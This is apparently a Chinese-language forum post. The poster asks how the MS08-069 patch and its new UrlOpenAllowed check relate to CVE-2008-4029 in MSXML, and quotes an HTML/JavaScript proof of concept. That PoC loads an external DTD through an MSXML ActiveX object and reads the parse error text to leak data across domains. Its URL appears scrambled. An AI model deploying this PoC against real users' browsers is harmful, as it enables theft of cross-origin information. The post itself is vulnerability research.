最近在看过于MS08-069的补丁,注意到其中关于CVE-2008-4029的补丁
其中在XMLParser::LoadDTD函数中看见microsoft加了一个UrlOpenAllowed函数,不清楚与CVE-2008-4029漏洞有什么关系?
还有想问大家这个POC怎么利用这个漏洞呢?
<html>
<body>
KB955218 - CVE-2008-4029 - JA
<script type="text/javascript">
var dom = new ActiveXObject("Msxml2.DOMDocument.3.0");
dom.async = false;
var url = "4e4K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3#2A6L8s2M7H3M7X3#2Q4x3X3g2U0L8$3#2Q4x3V1k6X3L8%4u0X3N6h3&6Q4x3X3g2V1N6r3b7`.";
var xml = "<!DOCTYPE pwn SYSTEM '" + url + "'>";
if (dom.loadXML(xml) == 0)
{
alert("Blue or Red Pill? " + dom.parseError.srcText);
}
</script>
</body>
</html>